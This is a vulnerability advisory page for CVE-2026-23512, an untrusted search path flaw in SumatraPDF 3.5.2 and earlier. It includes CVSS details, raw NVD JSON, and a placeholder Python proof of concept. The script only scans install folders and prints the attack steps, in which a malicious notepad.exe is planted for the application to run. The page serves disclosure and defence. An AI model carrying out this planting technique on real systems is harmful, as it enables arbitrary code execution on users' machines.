Security Vulnerability Report
中文
CVE-2026-23512 CVSS 8.6 HIGH

CVE-2026-23512

Published: 2026-01-14 21:15:54
Last Modified: 2026-02-03 17:56:30
Source: [email protected]

Description

SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, there is a Untrusted Search Path vulnerability when Advanced Options setting is trigger. The application executes notepad.exe without specifying an absolute path when using the Advanced Options setting. On Windows, this allows execution of a malicious notepad.exe placed in the application's installation directory, leading to arbitrary code execution.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sumatrapdfreader:sumatrapdf:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
SumatraPDF < 3.5.2
SumatraPDF 3.5.2 and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-23512 PoC - SumatraPDF Untrusted Search Path # This PoC demonstrates the vulnerability by creating a malicious notepad.exe # that will be executed when SumatraPDF's Advanced Options is triggered import os import shutil def create_malicious_notepad(): """ Create a malicious notepad.exe that executes arbitrary code This is a placeholder - actual malicious code would be injected here """ malicious_code = b'MZ' + b'\x90' * 50 + b'\x00' * 100 return malicious_code def check_vulnerability(): """ Check if SumatraPDF is installed and vulnerable Returns the installation path if vulnerable, None otherwise """ possible_paths = [ r'C:\Program Files\SumatraPDF', r'C:\Program Files (x86)\SumatraPDF', os.path.expanduser(r'~\AppData\Local\SumatraPDF') ] for path in possible_paths: if os.path.exists(path): notepad_path = os.path.join(path, 'notepad.exe') # Check if notepad.exe exists in installation directory if not os.path.exists(notepad_path): print(f'Potential vulnerability detected at: {path}') print('notepad.exe not found in installation directory') return path return None def main(): print('CVE-2026-23512 - SumatraPDF Untrusted Search Path PoC') print('=' * 60) # Check if vulnerable install_path = check_vulnerability() if install_path: print(f'\nVulnerable installation found at: {install_path}') print('\nAttack scenario:') print('1. Attacker places malicious notepad.exe in installation directory') print('2. User triggers Advanced Options in SumatraPDF') print('3. Malicious notepad.exe is executed with application privileges') print('4. Attacker gains code execution') else: print('No vulnerable SumatraPDF installation found') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23512", "sourceIdentifier": "[email protected]", "published": "2026-01-14T21:15:54.013", "lastModified": "2026-02-03T17:56:29.520", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, there is a Untrusted Search Path vulnerability when Advanced Options setting is trigger. The application executes notepad.exe without specifying an absolute path when using the Advanced Options setting. On Windows, this allows execution of a malicious notepad.exe placed in the application's installation directory, leading to arbitrary code execution."}, {"lang": "es", "value": "SumatraPDF es un lector multiformato para Windows. En 3.5.2 y versiones anteriores, existe una vulnerabilidad de ruta de búsqueda no confiable cuando se activa la configuración de Opciones Avanzadas. La aplicación ejecuta notepad.exe sin especificar una ruta absoluta al usar la configuración de Opciones Avanzadas. En Windows, esto permite la ejecución de un notepad.exe malicioso colocado en el directorio de instalación de la aplicación, lo que lleva a la ejecución de código arbitrario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sumatrapdfreader:sumatrapdf:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.5.2", "matchCriteriaId": "3D48C2C6-E8BC-471E-B59A-236F038EBC0C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://github.com/sumatrapdfreader/sumatrapdf/commit/2762e02a8cd7cb779c934a44257aac56ab7de673", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sumatrapdfreader/sumatrapdf/security/advisories/GHSA-rqg5-gj63-x4mv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.